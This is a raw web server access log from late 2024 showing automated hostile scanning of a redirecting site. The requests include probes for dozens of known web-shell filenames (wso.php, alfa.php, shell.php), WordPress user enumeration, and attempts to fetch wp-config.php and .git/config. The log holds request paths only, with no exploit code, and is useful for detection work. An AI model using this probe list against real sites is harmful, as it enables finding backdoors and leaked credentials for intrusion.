[24/Sep/2024:20:26:37 +0700] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:39 +0700] "GET /wp-admin/network/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:42 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:45 +0700] "GET /wp-content/uploads/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:48 +0700] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:50 +0700] "GET /wp-content/plugins/wp-diambar/includes/loadme.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:53 +0700] "GET /wp-content/plugins/zaen/includes/loadme.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:55 +0700] "GET /wp-content/plugins/zedd/1.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:57 +0700] "GET /wp-content/plugins/cakil/up.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:26:59 +0700] "GET /wp-content/wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:02 +0700] "GET /wp-content/wp/plugins/mbt.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:04 +0700] "GET /wp-content/plugins/wp-freeform/black2llleaf.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:07 +0700] "GET /wp-includes/wp-class.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:09 +0700] "GET /wp-content/plugins/mar.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:13 +0700] "GET /wp-admin/maint/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:15 +0700] "GET /wp-includes/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:17 +0700] "GET /wp-includes/shell.phpp HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:20 +0700] "GET /wp-content/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:22 +0700] "GET /wp-admin/alfa.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:24 +0700] "GET /wp-includes/upload.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:26 +0700] "GET /wp-admin/css/up.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:28 +0700] "GET /marijuana.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:31 +0700] "GET /wp-admin/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:34 +0700] "GET /wp-content/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:36 +0700] "GET /wp-includes/f0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:38 +0700] "GET /alfa.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:41 +0700] "GET /wp-includes/wp-class.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:43 +0700] "GET /wp-admin/includes/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:45 +0700] "GET /.well-known/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:47 +0700] "GET /images/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:49 +0700] "GET /WSO.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:52 +0700] "GET /lock360.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:54 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [24/Sep/2024:20:27:59 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 185.227.134.102 - - [24/Sep/2024:20:53:42 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 168.235.104.244 - - [25/Sep/2024:00:10:19 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" 104.248.153.130 - - [25/Sep/2024:03:58:08 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 147.185.132.123 - - [25/Sep/2024:06:35:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 205.169.39.24 - - [25/Sep/2024:10:22:36 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 51.15.16.101 - - [25/Sep/2024:14:28:22 +0700] "POST /ss.php HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 217.196.160.115 - - [25/Sep/2024:18:19:01 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 45.158.38.114 - - [26/Sep/2024:04:25:23 +0700] "GET /?author=11 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0" 183.56.195.224 - - [26/Sep/2024:04:25:24 +0700] "GET /?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1" 185.90.57.172 - - [26/Sep/2024:04:25:29 +0700] "GET /?author=21 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" 93.174.121.153 - - [26/Sep/2024:04:26:09 +0700] "GET /?author=31 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 45.139.11.105 - - [26/Sep/2024:04:26:09 +0700] "GET /?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" 162.253.17.205 - - [26/Sep/2024:04:26:42 +0700] "GET /?author=41 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" 51.15.16.101 - - [27/Sep/2024:02:13:18 +0700] "GET /geju.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.15.16.101 - - [27/Sep/2024:02:13:35 +0700] "GET /wp-content/plugins/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 205.210.31.248 - - [27/Sep/2024:05:50:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 167.99.187.222 - - [27/Sep/2024:14:19:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 34.44.36.52 - - [27/Sep/2024:20:11:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 94.156.68.236 - - [27/Sep/2024:23:08:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36" 34.94.32.92 - - [28/Sep/2024:04:42:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.139 - - [28/Sep/2024:05:25:39 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 77.68.100.201 - - [28/Sep/2024:06:37:58 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 77.68.100.201 - - [28/Sep/2024:06:38:03 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 77.68.100.201 - - [28/Sep/2024:06:38:06 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 104.152.52.61 - - [29/Sep/2024:02:55:01 +0700] "GET / HTTP/1.1" 301 162 "-" "curl/7.61.1" 167.94.145.105 - - [29/Sep/2024:05:49:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 152.42.187.164 - - [29/Sep/2024:13:49:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 51.15.16.101 - - [29/Sep/2024:16:04:21 +0700] "POST /ss.php HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 121.36.11.242 - - [01/Oct/2024:19:13:03 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 121.36.11.242 - - [01/Oct/2024:19:13:07 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 121.36.11.242 - - [01/Oct/2024:19:13:14 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 20.192.27.50 - - [01/Oct/2024:21:27:17 +0700] "GET /atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:22 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:26 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:31 +0700] "GET /wp-config.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:35 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:39 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:41 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:43 +0700] "GET /theme.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:45 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:49 +0700] "GET /ws.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:53 +0700] "GET /wso112233.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:27:57 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:28:00 +0700] "GET /fw.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:28:03 +0700] "GET /style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:28:06 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:28:11 +0700] "GET /corn.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:28:17 +0700] "GET /login.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.192.27.50 - - [01/Oct/2024:21:28:21 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 205.210.31.93 - - [02/Oct/2024:11:05:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 185.129.61.2 - - [02/Oct/2024:19:52:44 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 34.48.151.170 - - [04/Oct/2024:10:03:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.57 - - [04/Oct/2024:10:28:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.50 - - [05/Oct/2024:06:18:27 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 34.77.83.6 - - [05/Oct/2024:07:20:05 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 54.88.179.33 - - [05/Oct/2024:12:40:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 159.203.92.188 - - [06/Oct/2024:10:42:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 51.15.16.101 - - [06/Oct/2024:22:40:49 +0700] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 52.49.23.80 - - [08/Oct/2024:00:09:07 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 34.222.190.145 - - [08/Oct/2024:14:32:18 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)" 104.152.52.59 - - [09/Oct/2024:00:38:43 +0700] "GET / HTTP/1.1" 301 162 "-" "curl/7.61.1" 205.169.39.22 - - [09/Oct/2024:10:04:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 198.235.24.148 - - [09/Oct/2024:11:15:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 5.62.34.21 - - [09/Oct/2024:18:11:33 +0700] "GET /wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:34 +0700] "GET /images/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:36 +0700] "GET /uploads/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:38 +0700] "GET /assets/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:39 +0700] "GET /ALFA_DATA/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:41 +0700] "GET /ALFA_DATA/alfacgiapi/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:43 +0700] "GET /wordpress/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 